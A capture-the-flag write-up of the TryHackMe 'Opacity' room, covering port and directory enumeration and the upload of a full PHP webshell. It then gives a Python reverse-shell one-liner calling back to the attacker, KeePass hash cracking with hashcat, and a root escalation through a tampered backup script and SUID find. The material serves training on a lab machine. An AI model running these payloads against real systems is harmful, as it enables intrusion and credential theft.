Opacity
Last updated
Was this helpful?
Last updated
Was this helpful?
The following post by anthonyjsaab is licensed under
Link to room:
Machine version: Opacity2
This writeup walks you through a room on TryHackMe created by and
โโโ(kaliใฟkali)-[~]
โโ$ sudo nmap -sS -T5 -p- 10.10.148.146
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-26 17:56 EEST
Nmap scan report for 10.10.148.146
Host is up (0.12s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 253.34 secondsโโโ(kaliใฟkali)-[~]
โโ$ sudo nmap -sC -sV -O -p22,80,139,445 10.10.148.146
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-26 18:02 EEST
Nmap scan report for 10.10.148.146
Host is up (0.097s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 0f:ee:29:10:d9:8e:8c:53:e6:4d:e3:67:0c:6e:be:e3 (RSA)
| 256 95:42:cd:fc:71:27:99:39:2d:00:49:ad:1b:e4:cf:0e (ECDSA)
|_ 256 ed:fe:9c:94:ca:9c:08:6f:f2:5c:a6:cf:4d:3c:8e:5b (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-title: Login
|_Requested resource was login.php
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (93%), Linux 2.6.39 - 3.2 (93%), Linux 3.1 - 3.2 (93%), Linux 3.2 - 4.9 (93%), Linux 3.5 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb2-time:
| date: 2024-04-26T15:02:23
|_ start_date: N/A
|_nbstat: NetBIOS name: OPACITY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_clock-skew: -12s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.96 secondsโโโ(kaliใฟkali)-[~]
โโ$ gobuster dir -w /usr/share/wordlists/dirb/common.txt -u http://10.10.148.146
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.148.146
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 278]
/.htpasswd (Status: 403) [Size: 278]
/.htaccess (Status: 403) [Size: 278]
/css (Status: 301) [Size: 312] [--> http://10.10.148.146/css/]
/index.php (Status: 302) [Size: 0] [--> login.php]
/server-status (Status: 403) [Size: 278]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================
โโโ(kaliใฟkali)-[~]
โโ$ gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://10.10.148.146
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.148.146
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess (Status: 403) [Size: 278]
/.htpasswd (Status: 403) [Size: 278]
/cloud (Status: 301) [Size: 314] [--> http://10.10.148.146/cloud/]
/css (Status: 301) [Size: 312] [--> http://10.10.148.146/css/]
/server-status (Status: 403) [Size: 278]
Progress: 20469 / 20470 (100.00%)
===============================================================
Finished
===============================================================It seems this web app allows anonymous visitors to upload images to the server, and give out a link to access that image. The image is maybe erased after 5 minutes. Let us try it out.
โโโ(kaliใฟkali)-[~/Downloads]
โโ$ ls | grep *.jpg
f5054e97620f168c7b5088c85ab1d6e4.jpg
โโโ(kaliใฟkali)-[~/Downloads]
โโ$ python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...This is perfect for a webshell.
โโโ(kaliใฟkali)-[~/Downloads]
โโ$ ls *.php
php_webshell.php
โโโ(kaliใฟkali)-[~/Downloads]
โโ$ cat php_webshell.php
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd']);
}
?>
</pre>
</body>
<script>document.getElementById("cmd").focus();</script>
</html>
โโโ(kaliใฟkali)-[~/Downloads]
โโ$ python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...We are going to host the webshell source code on Kali and upload it to the server
โโโ(kaliใฟkali)-[~/Downloads]
โโ$ python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.148.146 - - [26/Apr/2024 21:18:21] "GET /php_webshell.php HTTP/1.1" 200 -For convenience, we will execute this reverse shell payload inside the webshell:
python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("10.14.78.249",5555));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("/bin/bash")'โโโ(kaliใฟkali)-[~/Downloads]
โโ$ nc -lvnp 5555
listening on [any] 5555 ...
connect to [10.14.78.249] from (UNKNOWN) [10.10.148.146] 35982
www-data@opacity:/var/www/html/cloud/images$We got our reverse shell! We now have a foothold in the target machine
โโโ(kaliใฟkali)-[~/Downloads]
โโ$ nc -lvnp 5555
listening on [any] 5555 ...
connect to [10.14.78.249] from (UNKNOWN) [10.10.148.146] 35982
www-data@opacity:/var/www/html/cloud/images$ cd ..
cd ..
www-data@opacity:/var/www/html/cloud$ ls
ls
folder.png images index.php load.gif storage.php style.css
www-data@opacity:/var/www/html/cloud$ cd /opt
cd /opt
www-data@opacity:/opt$ ls
ls
dataset.kdbx
www-data@opacity:/opt$ python -m http.server 80
www-data@opacity:/opt$ python3 -m http.server 8080
python3 -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
10.14.78.249 - - [26/Apr/2024 18:23:39] "GET / HTTP/1.1" 200 -
10.14.78.249 - - [26/Apr/2024 18:23:39] code 404, message File not found
10.14.78.249 - - [26/Apr/2024 18:23:39] "GET /favicon.ico HTTP/1.1" 404 -
10.14.78.249 - - [26/Apr/2024 18:23:40] "GET /dataset.kdbx HTTP/1.1" 200 -โโโ(kaliใฟkali)-[~/Downloads]
โโ$ wget http://10.10.148.146:8080/dataset.kdbx
--2024-04-26 21:27:41-- http://10.10.148.146:8080/dataset.kdbx
Connecting to 10.10.148.146:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1566 (1.5K) [application/octet-stream]
Saving to: โdataset.kdbxโ
dataset.kdbx 100%[==========================================>] 1.53K --.-KB/s in 0s
2024-04-26 21:27:41 (359 MB/s) - โdataset.kdbxโ saved [1566/1566]โโโ(kaliใฟkali)-[~/Downloads]
โโ$ keepass2john dataset.kdbx
dataset:$keepass$*2*100000*0*2114f635de17709ecc4a2be2c3403135ffd7c0dd09084c4abe1d983ad94d93a5*2bceccca0facfb762eb79ca66588135c72a8835e43d871977ff7d3e9db0ffa17*cae9a25c785fc7f16772bb00bac5cc82*b68e2c3be9e46e8b7fc05eb944fad8b4ec5254a40084a73127b4126408b2ff46*b0afde2bd0db881200fc1c2494baf7c28b7486f081a82e935411ab72a27736b4C:\Users\Anthony\Desktop\hashcat-6.2.6>hashcat -a 0 -m 13400 dataset.hash rockyou.txt
hashcat (v6.2.6) starting
Successfully initialized the NVIDIA main driver CUDA runtime library.
Failed to initialize NVIDIA RTC library.
* Device #1: CUDA SDK Toolkit not installed or incorrectly installed.
CUDA SDK Toolkit required for proper device support and utilization.
Falling back to OpenCL runtime.
* Device #1: WARNING! Kernel exec timeout is not disabled.
This may cause "CL_OUT_OF_RESOURCES" or related errors.
To disable the timeout, see: https://hashcat.net/q/timeoutpatch
OpenCL API (OpenCL 3.0 CUDA 12.4.131) - Platform #1 [NVIDIA Corporation]
========================================================================
* Device #1: NVIDIA GeForce RTX 4080 SUPER, 16256/16375 MB (4093 MB allocatable), 80MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 1470 MB
Dictionary cache built:
* Filename..: rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 0 secs
$keepass$*2*100000*0*2114f635de17709ecc4a2be2c3403135ffd7c0dd09084c4abe1d983ad94d93a5*2bceccca0facfb762eb79ca66588135c72a8835e43d871977ff7d3e9db0ffa17*cae9a25c785fc7f16772bb00bac5cc82*b68e2c3be9e46e8b7fc05eb944fad8b4ec5254a40084a73127b4126408b2ff46*b0afde2bd0db881200fc1c2494baf7c28b7486f081a82e935411ab72a27736b4:741852963
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13400 (KeePass 1 (AES/Twofish) and KeePass 2 (AES))
Hash.Target......: $keepass$*2*100000*0*2114f635de17709ecc4a2be2c34031...7736b4
Time.Started.....: Fri Apr 26 21:39:41 2024 (2 secs)
Time.Estimated...: Fri Apr 26 21:39:43 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 48964 H/s (8.45ms) @ Accel:4 Loops:512 Thr:256 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 81920/14344385 (0.57%)
Rejected.........: 0/81920 (0.00%)
Restore.Point....: 0/14344385 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:99840-100000
Candidate.Engine.: Device Generator
Candidates.#1....: 123456 -> janson
Hardware.Mon.#1..: Temp: 47c Fan: 0% Util:100% Core:2790MHz Mem:11251MHz Bus:16
Started: Fri Apr 26 21:39:38 2024
Stopped: Fri Apr 26 21:39:44 2024โโโ(kaliใฟkali)-[~/Downloads]
โโ$ ssh sysadmin@10.10.148.146
sysadmin@10.10.148.146's password:
Welcome to Ubuntu 20.04.5 LTS (GNU/Linux 5.4.0-139-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Fri 26 Apr 2024 06:50:43 PM UTC
System load: 0.05 Processes: 129
Usage of /: 57.1% of 8.87GB Users logged in: 0
Memory usage: 28% IPv4 address for eth0: 10.10.148.146
Swap usage: 0%
* Introducing Expanded Security Maintenance for Applications.
Receive updates to over 25,000 software packages with your
Ubuntu Pro subscription. Free for personal use.
https://ubuntu.com/pro
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Wed Feb 22 08:13:43 2023 from 10.0.2.15
sysadmin@opacity:~$ ls
local.txt scriptssysadmin@opacity:~$ ls -la
total 44
drwxr-xr-x 6 sysadmin sysadmin 4096 Feb 22 2023 .
drwxr-xr-x 3 root root 4096 Jul 26 2022 ..
-rw------- 1 sysadmin sysadmin 22 Feb 22 2023 .bash_history
-rw-r--r-- 1 sysadmin sysadmin 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 sysadmin sysadmin 3771 Feb 25 2020 .bashrc
drwx------ 2 sysadmin sysadmin 4096 Jul 26 2022 .cache
drwx------ 3 sysadmin sysadmin 4096 Jul 28 2022 .gnupg
-rw------- 1 sysadmin sysadmin 33 Jul 26 2022 local.txt
-rw-r--r-- 1 sysadmin sysadmin 807 Feb 25 2020 .profile
drwxr-xr-x 3 root root 4096 Jul 8 2022 scripts
drwx------ 2 sysadmin sysadmin 4096 Jul 26 2022 .ssh
-rw-r--r-- 1 sysadmin sysadmin 0 Jul 28 2022 .sudo_as_admin_successful
sysadmin@opacity:~$ cd scripts/
sysadmin@opacity:~/scripts$ ls -la
total 16
drwxr-xr-x 3 root root 4096 Jul 8 2022 .
drwxr-xr-x 6 sysadmin sysadmin 4096 Feb 22 2023 ..
drwxr-xr-x 2 sysadmin root 4096 Jul 26 2022 lib
-rw-r----- 1 root sysadmin 519 Jul 8 2022 script.php
sysadmin@opacity:~/scripts$ head script.php
<?php
//Backup of scripts sysadmin folder
require_once('lib/backup.inc.php');
zipData('/home/sysadmin/scripts', '/var/backups/backup.zip');
echo 'Successful', PHP_EOL;
//Files scheduled removal
$dir = "/var/www/html/cloud/images";
if(file_exists($dir)){
sysadmin@opacity:~/scripts$ head lib/backup.inc.php
<?php
ini_set('max_execution_time', 600);
ini_set('memory_limit', '1024M');
function zipData($source, $destination) {
if (extension_loaded('zip')) {
if (file_exists($source)) {
sysadmin@opacity:~/scripts$ cp lib/backup.inc.php ~
sysadmin@opacity:~/scripts$ which find
/usr/bin/find
sysadmin@opacity:~/scripts$ nano ~/backup.inc.php
sysadmin@opacity:~/scripts$ head ~/backup.inc.php
<?php
chmod ("/usr/bin/find", 7777);
ini_set('max_execution_time', 600);
ini_set('memory_limit', '1024M');
function zipData($source, $destination) {
if (extension_loaded('zip')) {
if (file_exists($source)) {
sysadmin@opacity:~/scripts$ mv ~/backup.inc.php lib/backup.inc.php
mv: replace 'lib/backup.inc.php', overriding mode 0644 (rw-r--r--)? yes
sysadmin@opacity:~/scripts$ ls -la /usr/bin/find
---sr-S--t 1 root root 320160 Feb 18 2020 /usr/bin/findsysadmin@opacity:~/scripts$ find . -exec /bin/sh -p \; -quit
# whoami
root
# cd /root
# ls
proof.txt snapThis guide helped me greatly:
